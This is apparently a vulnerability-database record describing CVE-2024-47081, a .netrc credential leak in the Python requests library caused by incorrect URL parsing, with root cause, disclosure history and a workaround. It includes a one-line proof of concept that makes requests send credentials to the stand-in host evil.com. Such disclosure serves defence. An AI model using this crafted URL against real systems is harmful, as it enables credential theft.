{"uuid": "a5ae6fa3-504b-4d03-a153-b9f12f911f71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Netrc credential leak in PSF requests library", "description": "The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc \ncredentials to third parties due to incorrect URL processing under specific conditions.\n\nIssuing the following API call triggers the vulnerability:\n\n`  requests.get('http://example.com:@evil.com/')`\n\nAssuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.\n\nThe root cause is \nhttps://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245\n\nThe vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. \nCVE-2024-47081 has been reserved by GitHub for this issue.\n\nAs a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.", "description_format": "markdown", "vulnerability": "CVE-2024-47081", "creation_timestamp": "2025-06-04T05:03:44.190775+00:00", "timestamp": "2025-06-04T05:03:44.190775+00:00", "related_vulnerabilities": ["CVE-2024-47081"], "meta": [{"ref": ["https://seclists.org/fulldisclosure/2025/Jun/2"]}], "author": {"login": "cedric", "name": "C\u00e9dric Bonhomme", "uuid": "af0120d0-3dac-4a6a-974b-a9f33d2a9846"}}